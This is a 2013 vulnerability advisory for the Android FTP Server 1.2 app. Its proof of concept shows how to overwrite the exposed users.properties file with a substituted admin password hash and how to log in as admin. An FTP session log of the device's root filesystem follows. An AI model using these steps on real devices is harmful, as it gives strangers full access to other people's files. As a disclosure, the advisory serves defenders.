Remote access to Android ftp server 1.2 configuration file allows login as admin.
9/7/2013
Larry W. Cashdollar, @_larry0

Download: http://www.amazon.com/888bid-com-Android-FTP-Server/dp/B00COVVAZM/ref=sr_1_1?s=mobile-apps

Description: "Transfer files between Android devices and computers without a USB cable and Windows software driver. 
Transfer files to and from your Android device over the Internet.
Use Windows Explorer to transfer files between your Android device and your computer by drag and drop. You can add additional users with read only permission for download, and read and write permission for both upload and download."

Vulnerability: ftp server exposes configuration file and allows read/write.  Allowing a remote user to overwrite the credentials for admin login giving full access to the file system on the device.

PoC:

Edit the users.properties file and re-upload.

#Generated file - don't edit (please)
#Sat Sep 07 16:13:44 EDT 2013
ftpserver.user.android.enableflag=true
ftpserver.user.admin.maxloginnumber=0
ftpserver.user.android.writepermission=true
ftpserver.user.android.idletime=0
ftpserver.user.admin.homedirectory=/ <-change to /
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.maxloginperip=0
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <- replace with 23594328\:070A6394BF17CD0A401F12ACC021714F 'android' password
ftpserver.user.admin.downloadrate=0
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.idletime=0
ftpserver.user.admin.uploadrate=0
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F


upload file as android/android user to ftpConfig/users.properties

login as admin/android

ftp> user admin
331 User name okay, need password for admin.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
ftp> dir
229 Entering Passive Mode (|||52585|)
150 File status okay; about to open data connection.
dr-x------   3 user group            0 Jul 11 20:09 acct
d--x------   3 user group            0 Aug 17 09:09 cache
d--x------   3 user group            0 Jul 11 20:09 config
dr-x------   3 user group            0 Dec 31  1969 d
d--x------   3 user group            0 Sep 16  2012 data
dr-x------   3 user group            0 Jul 11 20:15 dev
d--x------   3 user group            0 Sep  2 14:07 dropbox
dr-x------   3 user group            0 Mar 29 13:48 etc
dr-x------   3 user group            0 Jul 11 20:09 mnt
dr-x------   3 user group            0 Dec 31  1969 proc
d--x------   3 user group            0 Feb 26  2013 root
d--x------   3 user group            0 Dec 31  1969 sbin
drwx------   3 user group            0 Sep  7 15:09 sdcard
dr-x------   3 user group            0 Jul 11 20:09 sys
dr-x------   3 user group            0 Mar 29 13:49 system
dr-x------   3 user group            0 Mar 29 13:49 vendor
-r--------   1 user group          118 Dec 31  1969 default.prop
----------   1 user group        94200 Dec 31  1969 init
----------   1 user group         1677 Dec 31  1969 init.goldfish.rc
----------   1 user group        11658 Dec 31  1969 init.omap4430.rc
----------   1 user group        14869 Dec 31  1969 init.rc
-r--------   1 user group            0 Dec 31  1969 ueventd.goldfish.rc
-r--------   1 user group          840 Dec 31  1969 ueventd.omap4430.rc
-r--------   1 user group         4203 Dec 31  1969 ueventd.rc
226 Closing data connection.
ftp>